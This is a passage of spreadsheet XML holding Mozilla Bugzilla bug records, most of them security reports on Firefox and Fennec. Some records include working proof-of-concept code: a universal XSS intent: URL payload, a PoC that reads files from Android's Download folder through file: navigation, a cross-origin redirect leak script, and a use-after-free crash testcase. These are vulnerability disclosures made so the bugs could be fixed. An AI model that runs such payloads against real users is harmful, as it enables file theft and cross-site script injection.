        </is>
      </c>
      <c r="T4916" t="n">
        <v>1</v>
      </c>
      <c r="U4916" t="n">
        <v>0</v>
      </c>
      <c r="V4916" t="n">
        <v>25</v>
      </c>
      <c r="W4916" t="inlineStr">
        <is>
          <t>The GetFilesRequest IPC method on PContentParent appears to allow a compromised child to list arbitrary files: https://searchfox.org/mozilla-central/source/dom/ipc/ContentParent.cpp#5238
I haven't worked out whether this is just directory listings, or whether it can also get contents.
The threat model for the sandbox should not allow a child process to access the filesystem without affirmative user consent (e.g. the UI shown by &lt;input type=file&gt;, drag-and-drop, etc.).
I'm not super familiar with this code or how it's used, so I'd appreciate feeback.</t>
        </is>
      </c>
      <c r="X4916" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4917">
      <c r="A4917" t="n">
        <v>1208956</v>
      </c>
      <c r="B4917" t="inlineStr">
        <is>
          <t>2015-09-27 23:55:22 -0700</t>
        </is>
      </c>
      <c r="C4917" t="inlineStr">
        <is>
          <t>Universal XSS with browser_fallback_url extra in intent: URL on Fennec</t>
        </is>
      </c>
      <c r="D4917" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:58 -0700</t>
        </is>
      </c>
      <c r="E4917" t="n">
        <v>1</v>
      </c>
      <c r="F4917" t="n">
        <v>1</v>
      </c>
      <c r="G4917" t="n">
        <v>6</v>
      </c>
      <c r="H4917" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4917" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4917" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4917" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L4917" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4917" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4917" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4917" t="inlineStr">
        <is>
          <t>[adv-main42+]</t>
        </is>
      </c>
      <c r="Q4917" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4917" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4917" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T4917" t="n">
        <v>1</v>
      </c>
      <c r="U4917" t="n">
        <v>0</v>
      </c>
      <c r="V4917" t="n">
        <v>30</v>
      </c>
      <c r="W4917" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36
Steps to reproduce:
The following source code for Fennec allows universal XSS attack with the browser_fallback_url extra in intent: URL.
http://lxr.mozilla.org/mozilla-central/source/mobile/android/base/IntentHelper.java#186
Please see the live demo by Fennec.
https://mallory.csrf.jp/intent/fallback.html
In this page, parent document injects script code "alert(document.domain)" to nsa.gov opened in the iframe like this.
&lt;iframe src="https://www.nsa.gov" onload="this.src='intent://any#Intent;scheme=httpz;S.browser_fallback_url=javascript%3Aalert%28document.domain%29;end'"&gt;
Actual results:
The injected code to nsa.gov via "S.browser_fallback_url=javascript%3Aalert%28document.domain%29" in the intent: URL is executed.
Expected results:
The injected code should not be executed.</t>
        </is>
      </c>
      <c r="X4917" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4918">
      <c r="A4918" t="n">
        <v>1356893</v>
      </c>
      <c r="B4918" t="inlineStr">
        <is>
          <t>2017-04-16 09:28:12 -0700</t>
        </is>
      </c>
      <c r="C4918" t="inlineStr">
        <is>
          <t>Firefox for Android allows navigating from http: to file: URLs</t>
        </is>
      </c>
      <c r="D4918" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:59 -0700</t>
        </is>
      </c>
      <c r="E4918" t="n">
        <v>1</v>
      </c>
      <c r="F4918" t="n">
        <v>1</v>
      </c>
      <c r="G4918" t="n">
        <v>6</v>
      </c>
      <c r="H4918" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4918" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4918" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4918" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L4918" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4918" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4918" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4918" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4918" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+]</t>
        </is>
      </c>
      <c r="Q4918" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4918" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4918" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4918" t="n">
        <v>1</v>
      </c>
      <c r="U4918" t="n">
        <v>0</v>
      </c>
      <c r="V4918" t="n">
        <v>38</v>
      </c>
      <c r="W4918" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170323105023
Firefox for Android
Steps to reproduce:
Visit an remote (http) webpage:
&lt;script&gt;
location="intent:file:///(path)#Intent;type=text/html;end";
&lt;/script&gt;
Actual results:
The JS code above redirects the user to file: URL.
The redirection allows remote pages to exfiltrate files in /sdcard/Download/.
Here is a PoC that steals "secret" file in Download directory:
&lt;body style=font-size:300%&gt;
&lt;h1&gt;remote_attack.html&lt;/h1&gt;
&lt;p&gt;Downloading local_attack.html.&lt;/p&gt;
&lt;a id=a0 href="data:text/html,&lt;body style=font-size:300%&gt;
&lt;h1&gt;local_attack.html&lt;/h1&gt;
&lt;p&gt;Reading /sdcard/Download/secret.&lt;/p&gt;
&lt;script&gt;
var xhr=new XMLHttpRequest();
xhr.open('GET', 'secret', true);
xhr.onreadystatechange = function() {
  if (xhr.readyState == 4) alert(xhr.responseText)
};
xhr.send();
&lt;/script&gt;" download="local_attack.html"&gt;
&lt;script&gt;
// Attacker first downloads his attack page (local_attack.html) to sdcard
a0.click();
// Then navigates to the file with file scheme.
// (The file path below might need adjustment depending on the device)
setTimeout(function() {
  location="intent:file:///storage/emulated/0/Download/local_attack.html#Intent;type=text/html;end";
}, 2000);
&lt;/script&gt;
I confirmed the code works in Firefox for android v52.0.2 (Nexus 5x).
Expected results:
Navigation from http/https URLs to file URLs should be blocked.</t>
        </is>
      </c>
      <c r="X4918" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4919">
      <c r="A4919" t="n">
        <v>1111248</v>
      </c>
      <c r="B4919" t="inlineStr">
        <is>
          <t>2014-12-13 10:59:34 -0800</t>
        </is>
      </c>
      <c r="C4919" t="inlineStr">
        <is>
          <t>Crash in BooleanGetPrimitiveValueSlow</t>
        </is>
      </c>
      <c r="D4919" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:32 -0700</t>
        </is>
      </c>
      <c r="E4919" t="n">
        <v>1</v>
      </c>
      <c r="F4919" t="n">
        <v>1</v>
      </c>
      <c r="G4919" t="n">
        <v>3</v>
      </c>
      <c r="H4919" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4919" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4919" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4919" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4919" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4919" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4919" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4919" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q4919" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4919" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4919" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4919" t="n">
        <v>1</v>
      </c>
      <c r="U4919" t="n">
        <v>0</v>
      </c>
      <c r="V4919" t="n">
        <v>35</v>
      </c>
      <c r="W4919" t="inlineStr">
        <is>
          <t>Created attachment 8536066
crasher.js
We really need to double check our ObjectClassIs, or maybe just return false for ScriptedDirectProxies for the moment.</t>
        </is>
      </c>
      <c r="X4919" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4920">
      <c r="A4920" t="n">
        <v>141006</v>
      </c>
      <c r="B4920" t="inlineStr">
        <is>
          <t>2002-04-29 13:00:03 -0700</t>
        </is>
      </c>
      <c r="C4920" t="inlineStr">
        <is>
          <t>edit*.cgis should be run in taint mode</t>
        </is>
      </c>
      <c r="D4920" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E4920" t="n">
        <v>1</v>
      </c>
      <c r="F4920" t="n">
        <v>1</v>
      </c>
      <c r="G4920" t="n">
        <v>4</v>
      </c>
      <c r="H4920" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4920" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4920" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4920" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4920" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4920" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4920" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4920" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4920" t="inlineStr">
        <is>
          <t>[needed for win32bz]</t>
        </is>
      </c>
      <c r="Q4920" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4920" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4920" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4920" t="n">
        <v>1</v>
      </c>
      <c r="U4920" t="n">
        <v>0</v>
      </c>
      <c r="V4920" t="n">
        <v>24</v>
      </c>
      <c r="W4920" t="inlineStr">
        <is>
          <t>Taint mode should be enabled for admin cgis as well. See discussion in bug
140784 - it may be that this is nothing more than adding -T to the shebang
lines, but better test carefully. I guess this is 2.18, then.</t>
        </is>
      </c>
      <c r="X4920" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4921">
      <c r="A4921" t="n">
        <v>487872</v>
      </c>
      <c r="B4921" t="inlineStr">
        <is>
          <t>2009-04-10 15:50:44 -0700</t>
        </is>
      </c>
      <c r="C4921" t="inlineStr">
        <is>
          <t>Investigate NTLM reflection vulnerability</t>
        </is>
      </c>
      <c r="D4921" t="inlineStr">
        <is>
          <t>2010-07-15 19:10:25 -0700</t>
        </is>
      </c>
      <c r="E4921" t="n">
        <v>1</v>
      </c>
      <c r="F4921" t="n">
        <v>1</v>
      </c>
      <c r="G4921" t="n">
        <v>3</v>
      </c>
      <c r="H4921" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4921" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4921" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4921" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4921" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4921" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4921" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4921" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q4921" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4921" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4921" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T4921" t="n">
        <v>1</v>
      </c>
      <c r="U4921" t="n">
        <v>0</v>
      </c>
      <c r="V4921" t="n">
        <v>73</v>
      </c>
      <c r="W4921" t="inlineStr">
        <is>
          <t>Peter Allor from IBM X-Force reported that Mozilla's NTLM implementation is vulnerable to a type of "reflection attack" by which Firefox can be used to forward NTLM credentials to an arbitrary site.  I will attach the complete advisory shortly, but here are the first two paragraphs:
-----
Microsoft's MS08-068 patch addresses a SMB/NTLM vulnerability which allows an attacker to use a victim's NTLM credential in order to gain access to the victim's shared resources. This attack is often called a 'reflection attack'. The fix successfully protects a host against active exploitation by using tools such as smbrelay included in Metasploit. Similarly, part of this month's MS08-076 patch addresses instances in which a Windows Media Component fails to initialize NTLM security and thus opens an affected host to a potential reflection attack. However neither of these patches, as pointed out by HD Moore, address an attack that involves multiple targets since credential tokens used in all existing NTLM authentication protocols (i.e. LM, NTLM, and NTLMv2) can be forwarded to any host. In other words, the true vulnerability lies in the NTLM authentication's design.
This protocol flaw can be particularly troublesome since there are many applications that support NTLM.  In addition, we discovered that popular applications such as Mozilla Firefox and Opera are vulnerable to the reflection attack which involves two parties. Therefore, it is worth taking some time to discuss the internals of NTLM authentication in detail in order to understand the full extent of the vulnerability. For the rest of this article, we refer to two types of reflection attacks as two-party reflection attack and multi-host reflection attack. In a two-party reflection attack, attacker uses a stolen credential against the same victim, where as in a multi-host reflection attack, the credential is forwarded to a host other than the original victim.
-----</t>
        </is>
      </c>
      <c r="X4921" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4922">
      <c r="A4922" t="n">
        <v>624621</v>
      </c>
      <c r="B4922" t="inlineStr">
        <is>
          <t>2011-01-10 20:09:30 -0800</t>
        </is>
      </c>
      <c r="C4922" t="inlineStr">
        <is>
          <t>HTTP Redirections and remote content can be read by javascript errors.</t>
        </is>
      </c>
      <c r="D4922" t="inlineStr">
        <is>
          <t>2012-05-18 13:26:23 -0700</t>
        </is>
      </c>
      <c r="E4922" t="n">
        <v>1</v>
      </c>
      <c r="F4922" t="n">
        <v>1</v>
      </c>
      <c r="G4922" t="n">
        <v>3</v>
      </c>
      <c r="H4922" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4922" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4922" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4922" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4922" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4922" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4922" t="inlineStr">
        <is>
          <t>[sg:moderate][qa+] embargoed: cross-browser issue. credit in comment 2</t>
        </is>
      </c>
      <c r="Q4922" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4922" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4922" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4922" t="n">
        <v>1</v>
      </c>
      <c r="U4922" t="n">
        <v>0</v>
      </c>
      <c r="V4922" t="n">
        <v>83</v>
      </c>
      <c r="W4922" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Build Identifier: 
&lt;script&gt;
window.SyntaxError.prototype.__defineGetter__('name',function(){var e=this;for(var j in e){if(j!='name')console.log(j,e[j])}});
&lt;/script&gt;
&lt;script src="http://google.com/"&gt;&lt;/script&gt;
Reproducible: Always
Steps to Reproduce:
1. execute the afore mentioned code
2. see the console
3. see that fileName includes the final URL of the redirection
Actual Results:  
fileName leaks
Expected Results:  
fileName shouldn't leak, or should say the URL in the &lt;script src="..." attribute</t>
        </is>
      </c>
      <c r="X4922" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4923">
      <c r="A4923" t="n">
        <v>551661</v>
      </c>
      <c r="B4923" t="inlineStr">
        <is>
          <t>2010-03-11 03:23:09 -0800</t>
        </is>
      </c>
      <c r="C4923" t="inlineStr">
        <is>
          <t>unchecked allocations - potential buffer overrun in windows font code</t>
        </is>
      </c>
      <c r="D4923" t="inlineStr">
        <is>
          <t>2010-06-22 19:59:09 -0700</t>
        </is>
      </c>
      <c r="E4923" t="n">
        <v>1</v>
      </c>
      <c r="F4923" t="n">
        <v>1</v>
      </c>
      <c r="G4923" t="n">
        <v>3</v>
      </c>
      <c r="H4923" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4923" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4923" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4923" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L4923" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4923" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4923" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4923" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4923" t="inlineStr">
        <is>
          <t>[sg:critical? (possibly)] [qa-noaction-191] [qa-noaction-192]</t>
        </is>
      </c>
      <c r="Q4923" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4923" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4923" t="n">
        <v>1</v>
      </c>
      <c r="U4923" t="n">
        <v>0</v>
      </c>
      <c r="V4923" t="n">
        <v>12</v>
      </c>
      <c r="W4923" t="inlineStr">
        <is>
          <t>The code for Uniscribe-based text shaping in gfxWindowsFonts.cpp has a number of unchecked uses of nsTArray&lt;T&gt;::SetLength() to resize buffers that will then be passed to Uniscribe APIs. If any of these SetLength() calls fail due to lack of memory (unlikely, but conceivable especially with large textruns), we'd be passing invalid buffers to Uniscribe.
This is being fixed on trunk as part of bug 502906, but that (more extensive) patch is not intended for the 1.9.2 branch.</t>
        </is>
      </c>
      <c r="X4923" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4924">
      <c r="A4924" t="n">
        <v>851720</v>
      </c>
      <c r="B4924" t="inlineStr">
        <is>
          <t>2013-03-15 16:43:44 -0700</t>
        </is>
      </c>
      <c r="C4924" t="inlineStr">
        <is>
          <t>l10n build issues on central and aurora</t>
        </is>
      </c>
      <c r="D4924" t="inlineStr">
        <is>
          <t>2014-10-29 07:07:32 -0700</t>
        </is>
      </c>
      <c r="E4924" t="n">
        <v>1</v>
      </c>
      <c r="F4924" t="n">
        <v>1</v>
      </c>
      <c r="G4924" t="n">
        <v>5</v>
      </c>
      <c r="H4924" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4924" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4924" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4924" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4924" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4924" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4924" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4924" t="inlineStr"/>
      <c r="Q4924" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4924" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4924" t="n">
        <v>1</v>
      </c>
      <c r="U4924" t="n">
        <v>0</v>
      </c>
      <c r="V4924" t="n">
        <v>14</v>
      </c>
      <c r="W4924" t="inlineStr">
        <is>
          <t>Being on PTO, just a quick report:
https://aus3.mozilla.org/update/3/Firefox/22.0a1/20130314030914/Darwin_x86_64-gcc3-u-i386-x86_64/de/nightly/Darwin%2011.4.2/default/default/update.xml?force=1 comes out empty, but there are mac german nightlies from the 15th.
Also, I see a host of burning depend builds on aurora, and windows nightlies seem to be busted, too. error message there is a missing l10n repo, it seems,
*** Fix above errors and then restart with               "C:/mozilla-build/python27/python.exe e:/builds/moz2_slave/m-aurora-w32-l10n-ntly-0000000/build/mozilla-aurora/build/pymake/pymake/../make.py -f client.mk build"
e:\builds\moz2_slave\m-aurora-w32-l10n-ntly-0000000\build\mozilla-aurora\client.mk:321:0: command 'cd obj-firefox &amp;&amp;  MAKE="C:/mozilla-build/python27/python.exe e:/builds/moz2_slave/m-aurora-w32-l10n-ntly-0000000/build/mozilla-aurora/build/pymake/pymake/../make.py"  e:/builds/moz2_slave/m-aurora-w32-l10n-ntly-0000000/build/mozilla-aurora/configure  \
  || ( echo "*** Fix above errors and then restart with\
               \"C:/mozilla-build/python27/python.exe e:/builds/moz2_slave/m-aurora-w32-l10n-ntly-0000000/build/mozilla-aurora/build/pymake/pymake/../make.py -f client.mk build\"" &amp;&amp; exit 1 )' failed, return code 1
configure: error: Invalid value --with-l10n-base, ../../l10n-central doesn't exist</t>
        </is>
      </c>
      <c r="X4924" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4925">
      <c r="A4925" t="n">
        <v>823545</v>
      </c>
      <c r="B4925" t="inlineStr">
        <is>
          <t>2012-12-20 08:08:03 -0800</t>
        </is>
      </c>
      <c r="C4925" t="inlineStr">
        <is>
          <t>Dev Puppet config update for Postgres - socorro01.dev</t>
        </is>
      </c>
      <c r="D4925" t="inlineStr">
        <is>
          <t>2014-10-17 12:46:24 -0700</t>
        </is>
      </c>
      <c r="E4925" t="n">
        <v>1</v>
      </c>
      <c r="F4925" t="n">
        <v>1</v>
      </c>
      <c r="G4925" t="n">
        <v>5</v>
      </c>
      <c r="H4925" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4925" t="inlineStr">
        <is>
          <t>Data &amp; BI Services Team</t>
        </is>
      </c>
      <c r="J4925" t="inlineStr">
        <is>
          <t>DB: MySQL</t>
        </is>
      </c>
      <c r="K4925" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4925" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4925" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4925" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4925" t="inlineStr">
        <is>
          <t>[2013q3] August</t>
        </is>
      </c>
      <c r="Q4925" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4925" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4925" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4925" t="n">
        <v>1</v>
      </c>
      <c r="U4925" t="n">
        <v>0</v>
      </c>
      <c r="V4925" t="n">
        <v>24</v>
      </c>
      <c r="W4925" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #823542 +++
Attaching a diff for postgres configs.</t>
        </is>
      </c>
      <c r="X4925" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4926">
      <c r="A4926" t="n">
        <v>1291665</v>
      </c>
      <c r="B4926" t="inlineStr">
        <is>
          <t>2016-08-03 04:48:43 -0700</t>
        </is>
      </c>
      <c r="C4926" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsRefreshDriver::Tick</t>
        </is>
      </c>
      <c r="D4926" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:55 -0700</t>
        </is>
      </c>
      <c r="E4926" t="n">
        <v>1</v>
      </c>
      <c r="F4926" t="n">
        <v>1</v>
      </c>
      <c r="G4926" t="n">
        <v>3</v>
      </c>
      <c r="H4926" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4926" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4926" t="inlineStr">
        <is>
          <t>DOM: Animation</t>
        </is>
      </c>
      <c r="K4926" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L4926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4926" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4926" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q4926" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4926" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4926" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4926" t="n">
        <v>1</v>
      </c>
      <c r="U4926" t="n">
        <v>0</v>
      </c>
      <c r="V4926" t="n">
        <v>27</v>
      </c>
      <c r="W4926" t="inlineStr">
        <is>
          <t>Created attachment 8777297
crash.html minimized testcase: requires Jesse's dom fuzzing addon
The following testcase crashes the latest asan build of Firefox (BuildID=20160802030437):
&lt;script&gt;
function start() {
        o0=window.document;
        fuzzPriv.CC();
        requestAnimationFrame(f1);
}
function f1() {
        o856=document.documentElement['animate'](document.documentElement,Math.random()*10);
        o0.write('&lt;html&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;');
        setTimeout(f2, 4);
}
function f2() {
        o856.currentTime = 183;
        o856=null;o0=null;
        fuzzPriv.forceGC();
        fuzzPriv.CC();
        location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==1141==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e000098598 at pc 0x7f794e60de76 bp 0x7fffb0f76f90 sp 0x7fffb0f76f88
READ of size 8 at 0x60e000098598 thread T0 (Web Content)
    #0 0x7f794e60de75 in AddRef /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:37:5
    #1 0x7f794e60de75 in AddRef /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:384
    #2 0x7f794e60de75 in RefPtr /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:111
    #3 0x7f794e60de75 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:1711
    #4 0x7f794e6173ec in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:251:7
    #5 0x7f794e6170b9 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:270:5
    #6 0x7f794e618b34 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:430:9
    #7 0x7f794ef61944 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #8 0x7f7948b0ba9a in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20
    #9 0x7f79485c01cf in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2133:16
